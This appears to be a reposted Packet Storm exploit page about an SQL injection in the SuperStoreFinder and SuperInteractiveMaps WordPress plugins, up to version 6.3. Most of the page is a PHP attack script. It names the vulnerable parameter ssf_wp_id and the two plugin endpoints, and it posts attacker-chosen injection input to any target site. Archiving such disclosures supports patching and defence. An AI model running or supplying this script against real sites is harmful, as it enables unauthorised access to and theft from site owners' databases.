WordPress SuperStoreFinder / SuperInteractiveMaps 6.3 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 9th, 2021 📆 | 8422 Views ⚑

0

WordPress SuperStoreFinder / SuperInteractiveMaps 6.3 SQL Injection ≈ Packet Storm

< ?php
#Title : SuperStoreFinder & SuperInteractiveMaps WordPress Plugin SQL Injection
#Researcher : Eagle Eye
#Exploit Name : SSF & SIM SQL Injection
#Request type : POST
#Plugin Author : Joe lz
#Plugin Website : https://superstorefinder.net/
#Version Affected : All version (include latest 6.3)
#Date : 07/03/2021
#Tested on : Google Chrome,FireFox, Window 10 64bit
#Vuln parameter = ssf_wp_id
#Vuln ssf path : /wp-content/plugins/superstorefinder-wp/ssf-social-action.php
#Vuln sim path : /wp-content/plugins/super-interactive-maps/sim-wp-data.php
function filtration($input)
{
$dis = '/"/i';
$item = preg_replace($dis,"",$input);
echo $item;
}
function http_request($target,$toPost)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,$target);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$toPost);
$data = curl_exec($ch);

if(curl_errno($ch))
{
print curl_error($ch);
}
else
{
echo $data;
}
curl_close($ch);
}

if(isset($_POST['inject']))
{
switch($_POST['plugin'])
{
case 'ssf':
$toPost = "action=".$_POST['action']."&ssf_wp_id=".$_POST['id'];
$target = $_POST['target'].
"/wp-content/plugins/superstorefinder-wp/ssf-social-action.php";
http_request($target,$toPost);
break;
case 'sim':
$toPost = "id=".$_POST['id'];
$target = $_POST['target'].
"/wp-content/plugins/super-interactive-maps/sim-wp-data.php";
http_request($target,$toPost);
break;
}
}
?>

Source link

Tagged with:



Leave a Reply